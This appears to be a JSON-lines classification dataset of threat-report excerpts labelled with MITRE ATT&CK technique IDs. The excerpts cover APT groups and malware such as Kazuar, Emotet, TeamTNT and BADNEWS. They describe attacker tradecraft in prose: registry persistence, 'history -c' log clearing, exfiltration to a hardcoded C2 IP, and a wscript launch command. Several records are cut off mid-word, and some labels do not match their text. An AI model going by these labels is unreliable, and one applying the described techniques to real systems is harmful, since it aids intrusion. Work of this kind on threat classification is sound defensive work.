{"text1":"This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group","labels":"['T1555.003']"}
{"text1":"The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c\/bin\/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems","labels":"['T1047', 'T1057']"}
{"text1":"Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet","labels":"['T1027']"}
{"text1":"1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default \u2013 this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process","labels":"['T1547.001', 'T1564.003', 'T1112']"}
{"text1":"After deobfuscation you can see \u201cImminent Monitor\u201d string which may indicate it is related to Imminent Monitor RAT","labels":"['T1070.004', 'T1123', 'T1125']"}
{"text1":"In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4","labels":"['T1059.004', 'T1573.001']"}
{"text1":"Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading\/downloading, executing files, etc","labels":"['T1105', 'T1547']"}
{"text1":"CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data","labels":"['T1039', 'T1005']"}
{"text1":"The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process","labels":"['T1071.001', 'T1055']"}
{"text1":"All the scripts are deleted immediately after being executed. TeamTNT also uses the \u201chistory -c\u201d command to clear the shell log in every script","labels":"['T1070.004', 'T1070.003']"}
{"text1":"McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact","labels":"['T1560', 'T1059.003', 'T1573.001']"}
{"text1":"Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8","labels":"['T1566.001']"}
{"text1":"Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload\/Download\/Delete files to\/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host","labels":"['T1105', 'T1083']"}
{"text1":"While the ports associated with this sample\u2019s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets","labels":"['T1095', 'T1571']"}
{"text1":"If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim\u2019s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \u201cfile-less\u201d aspect of this method","labels":"['T1059.007']"}
{"text1":"This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive","labels":"['T1083', 'T1041', 'T1071.001']"}
{"text1":"It then modifies several registry key values to disable the IE browser\u2019s functions such as auto-complete, auto-suggest, etc. The disabled keys are: \"Use FormSuggest\", \"FormSuggest Passwords\", \"FormSuggest PW Ask\" under the sub-key \u201cHKCU\\Software\\Microsoft\\Internet Explorer\\Main\u201d, and \"AutoSuggest\" under the sub-key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete","labels":"['T1112']"}
{"text1":"Indeed, any decent firewall would block incoming packets to\u00a0any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible","labels":"['T1205']"}
{"text1":"The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server","labels":"['T1105']"}
{"text1":"The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings","labels":"['T1518.001', 'T1562.004']"}
{"text1":"Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample","labels":"['T1027']"}
{"text1":"This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on","labels":"['T1112']"}
{"text1":"Additional tools were recovered during the incident, including a network scanning\/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as \u2018spwebmember","labels":"['T1213.002', 'T1018', 'T1213.002']"}
{"text1":"Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article","labels":"['T1027']"}
{"text1":"The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails","labels":"['T1586.002']"}
{"text1":"Use of custom routines to decrypt strings (Deobfuscate\/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027","labels":"['T1140']"}
{"text1":"With the emergence of the Log4j security vulnerability, we\u2019ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems","labels":"['T1595.002']"}
{"text1":"The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously","labels":"['T1573.001']"}
{"text1":"Depending on the Ramsay version, file collection won\u2019t be restricted to the local system drive, but also will search additional drives such as network or removable drives","labels":"['T1039']"}
{"text1":"We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method","labels":"['T1036.005']"}
{"text1":"During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host\u2019s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations","labels":"['T1001.001']"}
{"text1":"The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised","labels":"['T1496']"}
{"text1":"Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload","labels":"['T1204.002', 'T1049', 'T1560.001', 'T1057', 'T1016', 'T1083']"}
{"text1":"It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents","labels":"['T1070.001']"}
{"text1":"We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion","labels":"['T1071.003', 'T1001.002']"}
{"text1":"Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this","labels":"['T1547.001']"}
{"text1":"DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them","labels":"['T1059.003', 'T1105', 'T1083']"}
{"text1":"The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included","labels":"['T1102.002']"}
{"text1":"Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection","labels":"['T1564.004', 'T1132.001', 'T1132.001']"}
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below","labels":"['T1547.001']"}
{"text1":"It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage","labels":"['T1059.001']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore","labels":"['T1560']"}
{"text1":"The \u201csysid\u201d parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer","labels":"['T1082']"}
{"text1":"Two days later, a second email \u2014 purportedly a warning from a Pakistani military about the Pegasus spyware \u2014 containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk","labels":"['T1566.002']"}
{"text1":"Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar","labels":"['T1547.001']"}
{"text1":"The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors \u2013 file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module","labels":"['T1119']"}
{"text1":"Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment","labels":"['T1547.001']"}
{"text1":"The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex \u2018com_mycompany_apps_appname_new\u2019. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim\u2019s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server","labels":"['T1105']"}
{"text1":"Fast-paced intrusion \u2022 Very stealthy \u2022 Rapidly changing tactics \u2022 Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30","labels":"['T1550.003']"}
{"text1":"Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord\u2019s content delivery network (CDN). Discord\u2019s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL","labels":"['T1102']"}
{"text1":"Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications","labels":"['T1573.002']"}
{"text1":"Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server","labels":"['T1048.003']"}
{"text1":"Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software\/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address\/identity documents","labels":"['T1539']"}
{"text1":"The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger","labels":"['T1047', 'T1497.001']"}
{"text1":"APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip","labels":"['T1547.001', 'T1021.004', 'T1018', 'T1560.001', 'T1021.001', 'T1090.001']"}
{"text1":"is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate","labels":"['T1115']"}
{"text1":"At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for","labels":"['T1553.002']"}
{"text1":"All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message\u2019s Subject: set to the id","labels":"['T1074.001']"}
{"text1":"If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties","labels":"['T1036.004']"}
{"text1":"This report provides background on Windows container vulnerabilities, gives a technical overview of Siloscape and offers recommendations on best practices for securing Windows containers","labels":"['T1068']"}
{"text1":"Fine-tuning Daserf. Our analyses revealed Daserf regularly undergoes technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Caesar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards","labels":"['T1027.002', 'T1027.005', 'T1027']"}
{"text1":"MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon","labels":"['T1105', 'T1608.001', 'T1059.001', 'T1059.005']"}
{"text1":"At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as \u201cmobile[.]recover-session-service[.]site\u201d etc","labels":"['T1583.001']"}
{"text1":"On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as \u201cAbout a role\u201d and \u201cJob Application\u201d. The attached documents used file names in the format of \u201cfirstname.surname_resume.doc","labels":"['T1140']"}
{"text1":"The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose","labels":"['T1083']"}
{"text1":"The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky","labels":"['T1218.007']"}
{"text1":"To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake","labels":"['T1016']"}
{"text1":"Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup\/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the\u00a0Whois Anchor Panda blog post","labels":"['T1102.002']"}
{"text1":"To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to know where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API","labels":"['T1010']"}
{"text1":"Key Points PrivateLoader is a downloader malware family that was first identified in early 2021 The loader\u2019s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t","labels":"['T1105']"}
{"text1":"AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect","labels":"['T1082', 'T1049']"}
{"text1":"It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I\/O for the writing file descriptor by using ioctl","labels":"['T1559']"}
{"text1":"The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account","labels":"['T1078', 'T1136.002']"}
{"text1":"Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz","labels":"['T1027', 'T1566.001', 'T1036']"}
{"text1":"Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process led to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access","labels":"['T1505.003']"}
{"text1":"Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected","labels":"['T1059.006']"}
{"text1":"Winnti Linux variant\u2019s core functionality is within \u2018libxselinux\u2019. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below","labels":"['T1027', 'T1140']"}
{"text1":"Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022","labels":"['T1105']"}
{"text1":"The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite","labels":"['T1564.003']"}
{"text1":"kaudited \u2014 A file installed as \/usr\/bin\/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process","labels":"['T1105']"}
{"text1":"These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control","labels":"['T1078.002']"}
{"text1":"TIN WOODLAWNTIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1059.001']"}
{"text1":"As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey","labels":"['T1012']"}
{"text1":"Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer","labels":"['T1566.001']"}
{"text1":"The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry","labels":"['T1059.003']"}
{"text1":"A typical response from the C2 server is a legitimate-looking webpage containing the string \u201c!DOCTYPE html\u201d, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode","labels":"['T1140']"}
{"text1":"One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns","labels":"['T1059.007']"}
{"text1":"The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp. The following information is collected from the victim","labels":"['T1074.001']"}
{"text1":"Like most ransomware, Sodinokibi encrypts files and adds a random extension such as \u201ctest.jpg.1cd8t9ahd5\u201d (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is \".1cd8t9ahd5\", the ransom message filename will be called \"1cd8t9ahd5-HOW-TO-DECRYPT.txt","labels":"['T1486']"}
{"text1":"The DUBNIUM samples are distributed in various ways, one instance was using a zero-day exploit that targets Adobe Flash, in December 2015","labels":"['T1203']"}
{"text1":"The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions \u2013 a combination of SHL\/SHR\/SUB\/ADD\/XOR \u2013 with hardcoded keys","labels":"['T1140']"}
{"text1":"This recent APT10 activity has included both traditional spear phishing and access to victim\u2019s networks through service providers. For more information on infection via service providers see M-Trends 2016). APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive","labels":"['T1204.002']"}
{"text1":"Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell","labels":"['T1059.003', 'T1505.003']"}
{"text1":"This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious","labels":"['T1057']"}
{"text1":"On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload","labels":"['T1059.005']"}
{"text1":"While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1041']"}
{"text1":"Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder","labels":"['T1036.004', 'T1574.002']"}
{"text1":"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe \/\/e:vbscript \/\/b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe","labels":"['T1140']"}
